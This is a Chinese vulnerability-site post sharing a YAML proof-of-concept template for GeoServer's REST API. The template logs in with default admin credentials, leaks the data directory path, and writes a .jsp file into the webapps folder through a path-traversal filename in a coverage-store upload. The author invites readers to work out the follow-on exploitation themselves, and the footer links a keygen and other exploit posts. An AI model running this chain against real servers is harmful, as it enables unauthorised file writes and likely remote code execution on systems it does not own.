Geoserver-coveragestore-fileupload-棉花糖会员站

detail:
  author: 
  links:
    - x
  vulnerability:
    level: critical
    tips: GEOSERVER_DATA_DIR=/opt/geoserver-2.14.1/data_dir |  java.class.path=/opt/geoserver-2.14.1/resources
    
name: poc-yaml-geoserver-coveragestore-fileupload
manual: true
transport: http
set:
    s1: randomInt(1000000000, 9000000000)
    s2: randomLowercase(8)
    reverse: newReverse()
    reverseURL: reverse.url
    workspaceName: randomLowercase(8)
    coverageStoreName: randomLowercase(8)
    fileName: randomLowercase(8)
    fileContent: randomLowercase(8)
rules:
    createWorkspace:
        request:
            cache: true
            method: POST
            path: /geoserver/rest/workspaces.xml
            follow_redirects: false
            headers:
              Authorization: Basic YWRtaW46Z2Vvc2VydmVy
              Content-type: application/xml
            body: <workspace><name>{{workspaceName}}</name></workspace>         
        expression: response.status == 201

    getAbsolutePath:
        request:
            cache: true
            method: GET
            path: /geoserver/rest/about/status
            follow_redirects: false
            headers:
              Authorization: Basic YWRtaW46Z2Vvc2VydmVy
            body: 
        expression: response.status == 200 && response.body_string.contains("GEOSERVER_DATA_DIR")

        output: 
          search: |-
            "GEOSERVER_DATA_DIR=(?P<tmp>.*?)/data_dir".submatch(response.body_string)
          absoluteDataPath: search["tmp"]

    createCoverageStore:
        request:
            cache: true
            method: POST
            path: /geoserver/rest/workspaces/{{workspaceName}}/coveragestores.xml
            follow_redirects: false
            headers:
              Authorization: Basic YWRtaW46Z2Vvc2VydmVy
              Content-Type: application/xml
            body: <coverageStore><name>{{coverageStoreName}}</name><description>Italian sample mosaic</description><type>ImageMosaic</type><enabled>true</enabled><workspace><name>{{workspaceName}}</name></workspace><__default>false</__default><url>file://{{absoluteDataPath}}/data_dir/coverages/mosaic_sample</url></coverageStore>
        expression: response.status == 201
          
    uploadFile:
        request:
            cache: true
            method: POST
            path: /geoserver/rest/workspaces/{{workspaceName}}/coveragestores/{{coverageStoreName}}/file.geotiff?filename=../../../webapps/{{fileName}}.jsp
            follow_redirects: false
            headers:
              Authorization: Basic YWRtaW46Z2Vvc2VydmVy
              Content-Type: application/x-www-form-urlencoded
            body: 123456
        expression: response.status == 202 && !response.body_string.contains("Error while storing uploaded file")


expression: createWorkspace() && getAbsolutePath() && createCoverageStore() && uploadFile()

看到有人问，就发出来了，至于后续的利用就自己去研究吧

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

Geoserver-coveragestore-fileupload

请登录后发表评论

1独家!超强代码审计工具上线！免费会员等你来嫖！

2有poc有语法，如何一分钟完成复现/批量检测

3某云安全视频教程

4Windows应急响应

5UltraEdit、UEStudio、UltraCompare 注册机

6Nacos Derby 远程命令执行(QVD-2024-26473)